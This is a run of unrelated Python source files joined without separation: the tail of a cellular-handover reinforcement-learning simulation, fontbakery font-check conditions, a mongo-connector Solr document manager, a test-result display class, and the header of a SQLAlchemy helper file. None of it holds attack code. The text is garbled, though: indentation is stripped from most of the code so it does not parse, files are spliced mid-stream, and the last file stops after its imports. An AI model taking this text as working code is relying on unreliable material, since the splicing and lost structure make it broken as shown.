# self.count_no_failure +=1.0
# else:
# self.count_failure += 1.0
# if self.count_failure + self.count_no_failure == LOCAL_T_MAX:
# self.rate_fail_ratio = self.count_failure / (self.count_failure + self.count_no_failure)
# self.count_failure = 0.0
# self.count_no_failure = 0.0
# if rate > last_rate:
# reward_rate = 1
# elif rate == last_rate:
# reward_rate = 0
# elif rate < last_rate:
# reward_rate = -1
# if self.count_handover + self.count_no_handover < 1000:
# self.reward_handover = 0
# elif self.count_handover + self.count_no_handover == 1000:
#
# if self.count_handover/(self.count_no_handover+self.count_handover) > 0.01:
#
# self.reward_handover = -1.0
# else:
# self.reward_handover = 1.0
# if self.count_failure + self.count_no_failure < LOCAL_T_MAX:
# reward_rate = 0
# elif self.count_failure + self.count_no_failure == LOCAL_T_MAX:
#
# if self.count_failure / (self.count_failure + self.count_no_failure) > 0.1:
# reward_rate = -10
# else:
# reward_rate = 10
# self.count_failure = 0.0
# self.count_no_failure = 0.0
# print (reward_rate, self.reward_handover)
# diff_rate = 10*(rate-last_rate)
# reward = self.reward_handover
return reward, rate
def _get_state(self):
feature_serve_vector = np.zeros(Num_CELL)
feature_serve_vector[self.serve_cell_id] = 1
# feature_handover = np.zeros(2)
# if action == self.last_serve_cell_id: #self.reward_handover == 1:
# feature_handover[0] = 1
# else:
# feature_handover[1] = 1
# s_t = self.rates
s_t = np.hstack((self.rates,feature_serve_vector))#feature_user_rates_vector,feature_handover
# s_t = feature_user_rates_vector
return s_t
def init_users(self):
"""
initialize user. every user consists of 4 params:
(1) loc_x(center) (2) loc_y(center) (3) which cell user is in (4) user mobility type
user mobility type is divided into 3 categories: low, medium and high. Low mobility users takes 70% of all,
while medium and high takes 20% and 10%.
:return: user: (1) loc_x(center) (2) loc_y(center) (3) which cell user is in (4) user mobility type
"""
while True:
user_x_tmp = np.random.randint(-40, -20, size=NUM_USER, dtype='int')
user_y_tmp = np.random.randint(-40, -20, size=NUM_USER, dtype='int')
if np.abs(user_x_tmp)<WINDOW_WIDTH/2 and np.abs(user_y_tmp)<WINDOW_WIDTH/2:#np.abs(user_x_tmp) < np.sqrt(3)/2.0 * outer_radius and (np.abs(user_x_tmp)+np.abs(user_y_tmp)/np.sqrt(3)) < outer_radius: #and (np.abs(user_x_tmp) > np.sqrt(3)/2.0*inner_radius or (np.abs(user_x_tmp)+np.abs(user_y_tmp)/np.sqrt(3)) > inner_radius):
user_x = user_x_tmp
user_y = user_y_tmp
break
self.users = np.hstack((user_x, user_y))
self.rates = get_rate_percell(self.users, cells)
        self.serve_cell_id = np.argmax(self.rates)
self.last_serve_cell_id = np.random.randint(Num_CELL)
def get_rate_percell(users, cells):
"""
get the rates of the user in all the cells if this user connects to the cell. return the array "rate" to represent the rate in the cells
"""
channels_square = np.random.normal(0,1, Num_CELL) # the fast fading from the user to all the cells
norm_distance = np.zeros(Num_CELL)
shadow_fading = np.random.lognormal(mean=0,sigma=0.8,size=Num_CELL)
for num in cell_id:
# print(num)
# print (cells[num][0] - users[0]) ** 2
# print (cells[num][1] - users[1]) ** 2
# print np.sqrt((cells[num][0] - users[0]) ** 2 + (cells[num][1] - users[1]) ** 2) * resolution / 20.0
norm_distance[num] = np.sqrt((cells[num][0] - users[0]) ** 2.0 + (cells[num][1] - users[1]) ** 2) * resolution# calculate the distance between user and each base station
large_scale = 10**((-36.7 * np.log10(norm_distance*10**-3)-149.5+shadow_fading)/10)#+10**-8
snr = channels_square**2 * large_scale # assume that "p * 10^-12/noise_power = 1" is feasible
rates = np.log2(1 + 10**7*snr)
return rates
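# A minimal driver sketch (hypothetical; assumes the local `constants` module
# on the import path provides LOCAL_T_MAX, direction and direction_index):
#
#     env = SystemModel()
#     last_action = env.serve_cell_id
#     while not env.terminal:
#         action = int(np.argmax(env.rates))  # greedy cell selection
#         env.state_update(last_action, action)
#         print(env.reward, env.rate)
#         env.update()
#         last_action = action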
import os
from typing import List
from collections import Counter
from fontbakery.callable import condition
# used to inform get_module_profile whether and how to create a profile
from fontbakery.fonts_profile import profile_factory # NOQA pylint: disable=unused-import,cyclic-import
@condition
def ttFont(font):
from fontTools.ttLib import TTFont
return TTFont(font)
@condition
def is_ttf(ttFont):
return 'glyf' in ttFont
@condition
def are_ttf(ttFonts):
for f in ttFonts:
if not is_ttf(f):
return False
# otherwise:
return True
@condition
def is_cff(ttFont):
return 'CFF ' in ttFont
@condition
def is_cff2(ttFont):
return 'CFF2' in ttFont
@condition
def variable_font_filename(ttFont):
from fontbakery.utils import get_name_entry_strings
from fontbakery.constants import (MacStyle,
NameID)
familynames = get_name_entry_strings(ttFont, NameID.FONT_FAMILY_NAME)
typo_familynames = get_name_entry_strings(ttFont, NameID.TYPOGRAPHIC_FAMILY_NAME)
if familynames == []:
return None
familyname = typo_familynames[0] if typo_familynames else familynames[0]
familyname = "".join(familyname.split(' ')) #remove spaces
if bool(ttFont["head"].macStyle & MacStyle.ITALIC):
familyname+="-Italic"
tags = ttFont["fvar"].axes
tags = list(map(lambda t: t.axisTag, tags))
tags.sort()
tags = "[{}]".format(",".join(tags))
return f"{familyname}{tags}.ttf"
@condition
def family_directory(font):
"""Get the path of font project directory."""
if font:
dirname = os.path.dirname(font)
if dirname == '':
dirname = '.'
return dirname
@condition
def sibling_directories(family_directory):
"""
Given a directory, this function tries to figure out where else in the filesystem
other related "sibling" families might be located.
This is guesswork and may not be able to find font files in other folders not yet
covered by this routine. We may improve this in the future by adding other
smarter filesystem lookup procedures or even by letting the user feed explicit
sibling family paths.
    This function returns a list of paths to directories where related font files were detected.
"""
SIBLING_SUFFIXES = ["sans",
"sc",
"narrow",
"text",
"display",
"condensed"]
base_family_dir = family_directory
for suffix in SIBLING_SUFFIXES:
if family_directory.endswith(suffix):
candidate = family_directory[:-len(suffix)]
if os.path.isdir(candidate):
base_family_dir = candidate
break
directories = [base_family_dir]
for suffix in SIBLING_SUFFIXES:
candidate = base_family_dir + suffix
if os.path.isdir(candidate):
directories.append(candidate)
return directories
@condition
def superfamily(sibling_directories):
"""
    Given a list of directories, this function looks for font files
    and returns a list of lists of the detected filepaths.
"""
result = []
for family_dir in sibling_directories:
filepaths = []
for entry in os.listdir(family_dir):
if entry[-4:] in [".otf", ".ttf"]:
filepaths.append(os.path.join(family_dir, entry))
result.append(filepaths)
return result
@condition
def superfamily_ttFonts(superfamily):
from fontTools.ttLib import TTFont
result = []
for family in superfamily:
result.append([TTFont(f) for f in family])
return result
@condition
def ligatures(ttFont):
from fontTools.ttLib.tables.otTables import LigatureSubst
all_ligatures = {}
try:
if "GSUB" in ttFont and ttFont["GSUB"].table.LookupList:
for record in ttFont["GSUB"].table.FeatureList.FeatureRecord:
if record.FeatureTag == 'liga':
for index in record.Feature.LookupListIndex:
lookup = ttFont["GSUB"].table.LookupList.Lookup[index]
for subtable in lookup.SubTable:
if isinstance(subtable, LigatureSubst):
for firstGlyph in subtable.ligatures.keys():
all_ligatures[firstGlyph] = []
for lig in subtable.ligatures[firstGlyph]:
if lig.Component not in all_ligatures[firstGlyph]:
all_ligatures[firstGlyph].append(lig.Component)
return all_ligatures
    except Exception:
return -1 # Indicate fontTools-related crash...
@condition
def ligature_glyphs(ttFont):
from fontTools.ttLib.tables.otTables import LigatureSubst
all_ligature_glyphs = []
try:
if "GSUB" in ttFont and ttFont["GSUB"].table.LookupList:
for record in ttFont["GSUB"].table.FeatureList.FeatureRecord:
if record.FeatureTag == 'liga':
for index in record.Feature.LookupListIndex:
lookup = ttFont["GSUB"].table.LookupList.Lookup[index]
for subtable in lookup.SubTable:
if isinstance(subtable, LigatureSubst):
for firstGlyph in subtable.ligatures.keys():
for lig in subtable.ligatures[firstGlyph]:
if lig.LigGlyph not in all_ligature_glyphs:
all_ligature_glyphs.append(lig.LigGlyph)
return all_ligature_glyphs
    except Exception:
return -1 # Indicate fontTools-related crash...
@condition
def glyph_metrics_stats(ttFont):
"""Returns a dict containing whether the font seems_monospaced,
what's the maximum glyph width and what's the most common width.
For a font to be considered monospaced, if at least 80% of ASCII
characters have glyphs, then at least 80% of those must have the same
width, otherwise all glyphs of printable characters must have one of
two widths or be zero-width.
"""
glyph_metrics = ttFont['hmtx'].metrics
# NOTE: `range(a, b)` includes `a` and does not include `b`.
# Here we don't include 0-31 as well as 127
# because these are control characters.
ascii_glyph_names = [ttFont.getBestCmap()[c] for c in range(32, 127)
if c in ttFont.getBestCmap()]
if len(ascii_glyph_names) > 0.8 * (127 - 32):
ascii_widths = [adv for name, (adv, lsb) in glyph_metrics.items()
if name in ascii_glyph_names and adv != 0]
ascii_width_count = Counter(ascii_widths)
ascii_most_common_width = ascii_width_count.most_common(1)[0][1]
seems_monospaced = ascii_most_common_width >= len(ascii_widths) * 0.8
else:
from fontTools import unicodedata
# Collect relevant glyphs.
relevant_glyph_names = set()
# Add character glyphs that are in one of these categories:
# Letter, Mark, Number, Punctuation, Symbol, Space_Separator.
# This excludes Line_Separator, Paragraph_Separator and Control.
for value, name in ttFont.getBestCmap().items():
if unicodedata.category(chr(value)).startswith(
("L", "M", "N", "P", "S", "Zs")
):
relevant_glyph_names.add(name)
# Remove character glyphs that are mark glyphs.
gdef = ttFont.get("GDEF")
if gdef and gdef.table.GlyphClassDef:
marks = {name
for name, c in gdef.table.GlyphClassDef.classDefs.items()
if c == 3
}
relevant_glyph_names.difference_update(marks)
widths = sorted({adv for name, (adv, lsb) in glyph_metrics.items()
if name in relevant_glyph_names and adv != 0})
seems_monospaced = len(widths) <= 2
width_max = max([adv for k, (adv, lsb) in glyph_metrics.items()])
most_common_width = Counter([g for g in glyph_metrics.values()
if g[0] != 0]).most_common(1)[0][0][0]
return {
"seems_monospaced": seems_monospaced,
"width_max": width_max,
"most_common_width": most_common_width,
}
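# A minimal direct-call sketch for debugging the monospace heuristic above
# (the font path is a hypothetical example):
#
#     from fontTools.ttLib import TTFont
#     stats = glyph_metrics_stats(TTFont("FiraMono-Regular.ttf"))
#     print(stats["seems_monospaced"], stats["width_max"], stats["most_common_width"])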
@condition
def missing_whitespace_chars(ttFont):
from fontbakery.utils import get_glyph_name
space = get_glyph_name(ttFont, 0x0020)
nbsp = get_glyph_name(ttFont, 0x00A0)
# tab = get_glyph_name(ttFont, 0x0009)
missing = []
if space is None: missing.append("0x0020")
if nbsp is None: missing.append("0x00A0")
# fonts probably don't need an actual tab char
# if tab is None: missing.append("0x0009")
return missing
@condition
def vmetrics(ttFonts):
from fontbakery.utils import get_bounding_box
v_metrics = {"ymin": 0, "ymax": 0}
for ttFont in ttFonts:
font_ymin, font_ymax = get_bounding_box(ttFont)
v_metrics["ymin"] = min(font_ymin, v_metrics["ymin"])
v_metrics["ymax"] = max(font_ymax, v_metrics["ymax"])
return v_metrics
@condition
def is_variable_font(ttFont):
return "fvar" in ttFont.keys()
@condition
def is_not_variable_font(ttFont):
return "fvar" not in ttFont.keys()
@condition
def VFs(ttFonts):
"""Returns a list of font files which are recognized as variable fonts"""
return [ttFont for ttFont in ttFonts
if is_variable_font(ttFont)]
@condition
def slnt_axis(ttFont):
if "fvar" in ttFont:
for axis in ttFont["fvar"].axes:
if axis.axisTag == "slnt":
return axis
@condition
def opsz_axis(ttFont):
if "fvar" in ttFont:
for axis in ttFont["fvar"].axes:
if axis.axisTag == "opsz":
return axis
@condition
def ital_axis(ttFont):
if "fvar" in ttFont:
for axis in ttFont["fvar"].axes:
if axis.axisTag == "ital":
return axis
@condition
def grad_axis(ttFont):
if "fvar" in ttFont:
for axis in ttFont["fvar"].axes:
if axis.axisTag == "GRAD":
return axis
def get_instance_axis_value(ttFont, instance_name, axis_tag):
if not is_variable_font(ttFont):
return None
instance = None
for i in ttFont["fvar"].instances:
name = ttFont["name"].getDebugName(i.subfamilyNameID)
if name == instance_name:
instance = i
break
if instance:
for axis in ttFont["fvar"].axes:
if axis.axisTag == axis_tag:
return instance.coordinates[axis_tag]
@condition
def regular_wght_coord(ttFont):
return get_instance_axis_value(ttFont, "Regular", "wght")
@condition
def bold_wght_coord(ttFont):
return get_instance_axis_value(ttFont, "Bold", "wght")
@condition
def regular_wdth_coord(ttFont):
return get_instance_axis_value(ttFont, "Regular", "wdth")
@condition
def regular_slnt_coord(ttFont):
return get_instance_axis_value(ttFont, "Regular", "slnt")
@condition
def regular_ital_coord(ttFont):
return get_instance_axis_value(ttFont, "Regular", "ital")
@condition
def regular_opsz_coord(ttFont):
return get_instance_axis_value(ttFont, "Regular", "opsz")
@condition
def vtt_talk_sources(ttFont) -> List[str]:
"""Return the tags of VTT source tables found in a font."""
VTT_SOURCE_TABLES = {'TSI0', 'TSI1', 'TSI2', 'TSI3', 'TSI5'}
tables_found = [tag for tag in ttFont.keys() if tag in VTT_SOURCE_TABLES]
return tables_found
@condition
def preferred_cmap(ttFont):
from fontbakery.utils import get_preferred_cmap
return get_preferred_cmap(ttFont)
@condition
def unicoderange(ttFont):
"""Get an integer bitmap representing the UnicodeRange fields in the os/2 table."""
os2 = ttFont['OS/2']
return (os2.ulUnicodeRange1 |
os2.ulUnicodeRange2 << 32 |
os2.ulUnicodeRange3 << 64 |
os2.ulUnicodeRange4 << 96)
@condition
def is_cjk_font(ttFont):
"""Test font object to confirm that it meets our definition of a CJK font file.
The definition is met if any of the following conditions are True:
1. The font has a CJK code page bit set in the OS/2 table
2. The font has a CJK Unicode range bit set in the OS/2 table
3. The font has any CJK Unicode code points defined in the cmap table
"""
from fontbakery.constants import (CJK_CODEPAGE_BITS,
CJK_UNICODE_RANGE_BITS,
CJK_UNICODE_RANGES)
os2 = ttFont["OS/2"]
# OS/2 code page checks
for _, bit in CJK_CODEPAGE_BITS.items():
if os2.ulCodePageRange1 & (1 << bit):
return True
# OS/2 Unicode range checks
for _, bit in CJK_UNICODE_RANGE_BITS.items():
if bit in range(0, 32):
if os2.ulUnicodeRange1 & (1 << bit):
return True
elif bit in range(32, 64):
if os2.ulUnicodeRange2 & (1 << (bit-32)):
return True
elif bit in range(64, 96):
if os2.ulUnicodeRange3 & (1 << (bit-64)):
return True
# defined CJK Unicode code point in cmap table checks
cmap = ttFont.getBestCmap()
for unicode_range in CJK_UNICODE_RANGES:
for x in range(unicode_range[0], unicode_range[1]+1):
if int(x) in cmap:
return True
# default, return False if the above checks did not identify a CJK font
return False
@condition
def get_cjk_glyphs(ttFont):
"""Return all glyphs which belong to a CJK unicode block"""
from fontbakery.constants import CJK_UNICODE_RANGES
results = []
cjk_unicodes = set()
for start, end in CJK_UNICODE_RANGES:
cjk_unicodes |= set(u for u in range(start, end+1))
for uni, glyph_name in ttFont.getBestCmap().items():
if uni in cjk_unicodes:
results.append(glyph_name)
return results
@condition
def typo_metrics_enabled(ttFont):
return ttFont['OS/2'].fsSelection & 0b10000000 > 0
@condition
def is_indic_font(ttFont):
INDIC_FONT_DETECTION_CODEPOINTS = [
0x0988, # Bengali
0x0908, # Devanagari
0x0A88, # Gujarati
0x0A08, # Gurmukhi
        0x0C88, # Kannada
        0x0D08, # Malayalam
0xABC8, # Meetei Mayek
0x1C58, # OlChiki
0x0B08, # Oriya
0x0B88, # Tamil
0x0C08, # Telugu
]
font_codepoints = ttFont['cmap'].getBestCmap().keys()
for codepoint in INDIC_FONT_DETECTION_CODEPOINTS:
if codepoint in font_codepoints:
return True
#otherwise:
return False
@condition
def is_italic(ttFont):
return (
ttFont["OS/2"].fsSelection & 0x1
or ("post" in ttFont and ttFont["post"].italicAngle)
or ttFont["head"].macStyle & 0x2
)
@condition
def is_not_italic(ttFont):
return not is_italic(ttFont)
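# A minimal sketch of exercising these conditions outside the check runner
# (conditions in this module already call each other directly, e.g.
# are_ttf -> is_ttf, so they remain plain callables; the font path is
# hypothetical):
#
#     from fontTools.ttLib import TTFont
#     font = TTFont("MyFamily-Italic.ttf")
#     print(is_ttf(font), is_variable_font(font), is_italic(font))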
# Copyright 2013-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Receives documents from the oplog worker threads and indexes them
into the backend.
This file is a document manager for the Solr search engine, but the intent
is that this file can be used as an example to add on different backends.
To extend this to other systems, simply implement the exact same class and
replace the method definitions with API calls for the desired backend.
"""
import re
import json
from itertools import islice
import bson.json_util as bsjson
from pysolr import Solr, SolrError
from mongo_connector import errors
from mongo_connector.constants import (DEFAULT_COMMIT_INTERVAL,
DEFAULT_MAX_BULK)
from mongo_connector.util import retry_until_ok
from mongo_connector.doc_managers import DocManagerBase, exception_wrapper
# pysolr only has 1 exception: SolrError
wrap_exceptions = exception_wrapper({
SolrError: errors.OperationFailed})
ADMIN_URL = 'admin/luke?show=schema&wt=json'
decoder = json.JSONDecoder()
class DocManager(DocManagerBase):
"""The DocManager class creates a connection to the backend engine and
adds/removes documents, and in the case of rollback, searches for them.
The reason for storing id/doc pairs as opposed to doc's is so that multiple
updates to the same doc reflect the most up to date version as opposed to
multiple, slightly different versions of a doc.
"""
def __init__(self, url, auto_commit_interval=DEFAULT_COMMIT_INTERVAL,
unique_key='_id', chunk_size=DEFAULT_MAX_BULK, **kwargs):
"""Verify Solr URL and establish a connection.
"""
self.solr = Solr(url)
self.unique_key = unique_key
# pysolr does things in milliseconds
if auto_commit_interval is not None:
self.auto_commit_interval = auto_commit_interval * 1000
else:
self.auto_commit_interval = None
self.chunk_size = chunk_size
self.field_list = []
self._build_fields()
def _parse_fields(self, result, field_name):
""" If Schema access, parse fields and build respective lists
"""
field_list = []
for key, value in result.get('schema', {}).get(field_name, {}).items():
if key not in field_list:
field_list.append(key)
return field_list
@wrap_exceptions
def _build_fields(self):
""" Builds a list of valid fields
"""
declared_fields = self.solr._send_request('get', ADMIN_URL)
result = decoder.decode(declared_fields)
self.field_list = self._parse_fields(result, 'fields')
# Build regular expressions to match dynamic fields.
# dynamic field names may have exactly one wildcard, either at
# the beginning or the end of the name
self._dynamic_field_regexes = []
        for wc_pattern in self._parse_fields(result, 'dynamicFields'):
            if wc_pattern[0] == "*":
                self._dynamic_field_regexes.append(
                    re.compile(r".*%s\Z" % wc_pattern[1:]))
            elif wc_pattern[-1] == "*":
                self._dynamic_field_regexes.append(
                    re.compile(r"\A%s.*" % wc_pattern[:-1]))
def _clean_doc(self, doc):
"""Reformats the given document before insertion into Solr.
This method reformats the document in the following ways:
- removes extraneous fields that aren't defined in schema.xml
- unwinds arrays in order to find and later flatten sub-documents
- flattens the document so that there are no sub-documents, and every
value is associated with its dot-separated path of keys
An example:
{"a": 2,
"b": {
"c": {
"d": 5
}
},
"e": [6, 7, 8]
}
becomes:
{"a": 2, "b.c.d": 5, "e.0": 6, "e.1": 7, "e.2": 8}
"""
# SOLR cannot index fields within sub-documents, so flatten documents
# with the dot-separated path to each value as the respective key
def flattened(doc):
def flattened_kernel(doc, path):
for k, v in doc.items():
path.append(k)
if isinstance(v, dict):
for inner_k, inner_v in flattened_kernel(v, path):
yield inner_k, inner_v
elif isinstance(v, list):
for li, lv in enumerate(v):
path.append(str(li))
if isinstance(lv, dict):
for dk, dv in flattened_kernel(lv, path):
yield dk, dv
else:
yield ".".join(path), lv
path.pop()
else:
yield ".".join(path), v
path.pop()
return dict(flattened_kernel(doc, []))
# Translate the _id field to whatever unique key we're using
doc[self.unique_key] = doc["_id"]
flat_doc = flattened(doc)
# Only include fields that are explicitly provided in the
# schema or match one of the dynamic field patterns, if
# we were able to retrieve the schema
if len(self.field_list) + len(self._dynamic_field_regexes) > 0:
def include_field(field):
return field in self.field_list or any(
regex.match(field) for regex in self._dynamic_field_regexes
)
return dict((k, v) for k, v in flat_doc.items() if include_field(k))
return flat_doc
def stop(self):
""" Stops the instance
"""
pass
def apply_update(self, doc, update_spec):
"""Override DocManagerBase.apply_update to have flat documents."""
# Replace a whole document
        if '$set' not in update_spec and '$unset' not in update_spec:
# update spec contains the new document
update_spec['_ts'] = doc['_ts']
update_spec['ns'] = doc['ns']
return update_spec
for to_set in update_spec.get("$set", []):
value = update_spec['$set'][to_set]
# Find dotted-path to the value, remove that key from doc, then
# put value at key:
keys_to_pop = []
for key in doc:
if key.startswith(to_set):
if key == to_set or key[len(to_set)] == '.':
keys_to_pop.append(key)
for key in keys_to_pop:
doc.pop(key)
doc[to_set] = value
for to_unset in update_spec.get("$unset", []):
doc.pop(to_unset)
return doc
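    # A worked example of the flat-document update semantics above
    # (hypothetical values): applying {"$set": {"b.c": 9}} to
    # {"_id": 1, "b.c.d": 5} pops the dotted key "b.c.d" (its path starts
    # with the prefix "b.c" followed by "."), then stores {"_id": 1, "b.c": 9}.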
@wrap_exceptions
def update(self, doc, update_spec):
"""Apply updates given in update_spec to the document whose id
matches that of doc.
"""
query = "%s:%s" % (self.unique_key, str(doc['_id']))
results = self.solr.search(query)
if not len(results):
# Document may not be retrievable yet
self.commit()
results = self.solr.search(query)
# Results is an iterable containing only 1 result
for doc in results:
updated = self.apply_update(doc, update_spec)
# A _version_ of 0 will always apply the update
updated['_version_'] = 0
self.upsert(updated)
return updated
@wrap_exceptions
def upsert(self, doc):
"""Update or insert a document into Solr
This method should call whatever add/insert/update method exists for
the backend engine and add the document in there. The input will
always be one mongo document, represented as a Python dictionary.
"""
if self.auto_commit_interval is not None:
self.solr.add([self._clean_doc(doc)],
commit=(self.auto_commit_interval == 0),
commitWithin=str(self.auto_commit_interval))
else:
self.solr.add([self._clean_doc(doc)], commit=False)
@wrap_exceptions
def bulk_upsert(self, docs):
"""Update or insert multiple documents into Solr
docs may be any iterable
"""
if self.auto_commit_interval is not None:
add_kwargs = {
"commit": (self.auto_commit_interval == 0),
"commitWithin": self.auto_commit_interval
}
else:
add_kwargs = {"commit": False}
cleaned = (self._clean_doc(d) for d in docs)
        if self.chunk_size > 0:
            # Pull documents in chunks of `chunk_size`; islice avoids raising
            # StopIteration inside a generator expression, which is an error
            # under PEP 479 (Python 3.7+).
            batch = list(islice(cleaned, self.chunk_size))
            while batch:
                self.solr.add(batch, **add_kwargs)
                batch = list(islice(cleaned, self.chunk_size))
        else:
            self.solr.add(cleaned, **add_kwargs)
@wrap_exceptions
def remove(self, doc):
"""Removes documents from Solr
The input is a python dictionary that represents a mongo document.
"""
self.solr.delete(id=str(doc[self.unique_key]),
commit=(self.auto_commit_interval == 0))
@wrap_exceptions
def _remove(self):
"""Removes everything
"""
self.solr.delete(q='*:*', commit=(self.auto_commit_interval == 0))
@wrap_exceptions
def search(self, start_ts, end_ts):
"""Called to query Solr for documents in a time range.
"""
query = '_ts: [%s TO %s]' % (start_ts, end_ts)
return self.solr.search(query, rows=100000000)
@wrap_exceptions
def _search(self, query):
"""For test purposes only. Performs search on Solr with given query
Does not have to be implemented.
"""
return self.solr.search(query, rows=200)
def commit(self):
"""This function is used to force a commit.
"""
retry_until_ok(self.solr.commit)
@wrap_exceptions
def get_last_doc(self):
"""Returns the last document stored in the Solr engine.
"""
# Search everything, sort by descending timestamp, return one row.
try:
result = self.solr.search('*:*', sort='_ts desc', rows=1)
except ValueError:
return None
if len(result) == 0:
return None
return result.docs[0]
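
# A hedged, self-contained sketch (not part of this manager) of the flat
# "$set" semantics implemented by apply_update() above: keys at or under
# a dotted path are dropped before the new value is assigned. All names
# and values here are illustrative.
def _demo_flat_set():
    doc = {'_id': 1, 'a.b': 1, 'a.c': 2, '_ts': 10, 'ns': 'db.col'}
    update_spec = {'$set': {'a': {'d': 3}}}
    for to_set, value in update_spec['$set'].items():
        # Drop keys at or under the dotted path, then assign the value.
        for key in [k for k in doc
                    if k == to_set or k.startswith(to_set + '.')]:
            doc.pop(key)
        doc[to_set] = value
    assert doc == {'_id': 1, '_ts': 10, 'ns': 'db.col', 'a': {'d': 3}}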
|
|
"""
The display module.
"""
from jasper.utility import extract_traceback
from termcolor import colored
import textwrap
import colorama
import sys
class Display(object):
"""
The class responsible for displaying the results of suites, features, scenarios, and steps.
"""
def __init__(self, force_ansi=True, verbosity_level=0):
"""
Initialize a new Display object.
:param force_ansi: Flag for whether or not to force the display to use ANSI escape sequences. Default is True.
:param verbosity_level: The verbosity level for the display to use. Default is 0; maxes out at 2.
"""
self.display_string = ''
self.indentation_level = 0
self.verbosity_level = verbosity_level
self.colored = True
self.force_ansi = force_ansi
colorama.deinit()
def display(self):
"""
Print the prepared data to the screen.
"""
if sys.platform == 'win32' and not self.force_ansi:
colorama.init()
print(self.display_string)
colorama.deinit()
def cyan(self, text):
"""
Color some text cyan.
If the display's color is disabled, the text will not be colorized.
:param text: The text to color.
:return: The colored text
"""
return colored(text, 'cyan') if self.colored else text
def yellow(self, text):
"""
Color some text yellow.
If the display's color is disabled, the text will not be colorized.
:param text: The text to color.
:return: The colored text
"""
return colored(text, 'yellow') if self.colored else text
def red(self, text):
"""
Color some text red.
If the display's color is disabled, the text will not be colorized.
:param text: The text to color.
:return: The colored text
"""
return colored(text, 'red') if self.colored else text
def grey(self, text):
"""
Color some text grey.
If the display's color is disabled, the text will not be colorized.
:param text: The text to color.
:return: The colored text
"""
return colored(text, 'white') if self.colored else text
@staticmethod
def indent(text, amount):
"""
Indent some text by the given amount.
:param text: The text to indent.
:param amount: The amount of spaces to indent the text with.
:return: The indented text.
"""
return textwrap.indent(text, ' ' * amount)
def __push_to_display(self, display_string):
self.display_string += self.indent(display_string + '\n', self.indentation_level)
def prepare_suite(self, suite):
"""
Prepare a Suite object to be displayed.
:param suite: The Suite to prepare.
"""
color = self.cyan if suite.passed else self.red
if not suite.passed or self.verbosity_level > 0:
for feature in suite.features:
self.prepare_feature(feature)
self.__push_to_display(self.prepare_border(color, 150))
self.prepare_statistics(suite)
self.__push_to_display(self.prepare_border(color, 150))
def prepare_feature(self, feature):
"""
Prepare a Feature object to be displayed.
:param feature: The Feature to prepare.
"""
if not feature.passed or self.verbosity_level > 0:
color = self.cyan if feature.passed else self.red
self.__push_to_display(self.prepare_border(color, 150))
self.__push_to_display(color(f'Feature: {feature.description}'))
self.indentation_level += 4
if not feature.passed or self.verbosity_level > 1:
for before in feature.before_all:
self.prepare_step(before, 'BeforeAll')
for after in feature.after_all:
self.prepare_step(after, 'AfterAll')
for before in feature.before_each:
self.prepare_step(before, 'BeforeEach')
for after in feature.after_each:
self.prepare_step(after, 'AfterEach')
for scenario in feature.scenarios:
self.prepare_scenario(scenario)
if feature.exception is not None:
self.prepare_exception(feature.exception)
self.indentation_level -= 4
self.__push_to_display(self.prepare_border(color, 150))
def prepare_scenario(self, scenario):
"""
Prepare a Scenario object to be displayed.
:param scenario: The Scenario to prepare.
"""
if not scenario.passed or self.verbosity_level > 0:
if not scenario.ran:
color = self.grey
elif scenario.passed:
color = self.cyan
else:
color = self.red
self.__push_to_display(color(f'Scenario: {scenario.description}'))
if not scenario.passed or self.verbosity_level > 1:
self.indentation_level += 4
for before in scenario.before_all:
self.prepare_step(before, 'BeforeAll')
for after in scenario.after_all:
self.prepare_step(after, 'AfterAll')
for before in scenario.before_each:
self.prepare_step(before, 'BeforeEach')
for after in scenario.after_each:
self.prepare_step(after, 'AfterEach')
for index, given in enumerate(scenario.given):
self.prepare_step(given, 'Given') if index == 0 else self.prepare_step(given, 'And')
for index, when in enumerate(scenario.when):
self.prepare_step(when, 'When') if index == 0 else self.prepare_step(when, 'And')
for index, then in enumerate(scenario.then):
self.prepare_step(then, 'Then') if index == 0 else self.prepare_step(then, 'And')
if scenario.exception is not None:
self.prepare_exception(scenario.exception)
self.indentation_level -= 4
def prepare_step(self, step, step_name):
"""
Prepare a Step object to be displayed.
:param step: The Step to prepare.
:param step_name: A name to represent the step with.
"""
if not step.ran:
color = self.grey
elif step.passed:
color = self.cyan
else:
color = self.red
self.__push_to_display(color(f"{step_name}: "
f"{step.function.__name__} {step.kwargs if step.kwargs else ''}"))
def prepare_exception(self, exception):
"""
Prepare an exception to be displayed.
:param exception: The exception to prepare.
"""
if str(exception):
exception_string = f'{str(exception)}\n'
else:
exception_string = f'{exception.__class__.__name__}\n'
traceback_string = f'{extract_traceback(exception)}'
self.__push_to_display(self.yellow((exception_string + traceback_string).rstrip()))
def prepare_border(self, color, length):
"""
Prepare a border to be displayed.
:param color: The color to give the border.
:param length: The length of the border.
"""
return color('=' * length)
def prepare_statistics(self, suite):
"""
Prepare the statistics of a Suite object to be displayed.
:param suite: The Suite object to prepare the statistics for.
"""
color = self.cyan if suite.passed else self.red
self.__push_to_display(
color(
f'{suite.num_features_passed} Features passed, {suite.num_features_failed} failed.\n'
f'{suite.num_scenarios_passed} Scenarios passed, {suite.num_scenarios_failed} failed.'
)
)
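
# Hedged usage sketch (not part of jasper): Display only needs duck-typed
# objects, so a SimpleNamespace is enough to render a single step. The
# demo_step function and attribute values below are illustrative only.
if __name__ == '__main__':
    from types import SimpleNamespace

    def demo_step():
        pass

    display = Display(verbosity_level=2)
    step = SimpleNamespace(ran=True, passed=True, function=demo_step,
                           kwargs={})
    display.prepare_step(step, 'Given')
    display.display()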
|
|
#!/usr/bin/env python
# cardinal_pythonlib/sqlalchemy/list_types.py
"""
===============================================================================
Original code copyright (C) 2009-2021 Rudolf Cardinal (rudolf@pobox.com).
This file is part of cardinal_pythonlib.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
===============================================================================
**SQLAlchemy type classes to store different kinds of lists in a database.**
"""
import csv
from io import StringIO
from typing import List, Optional
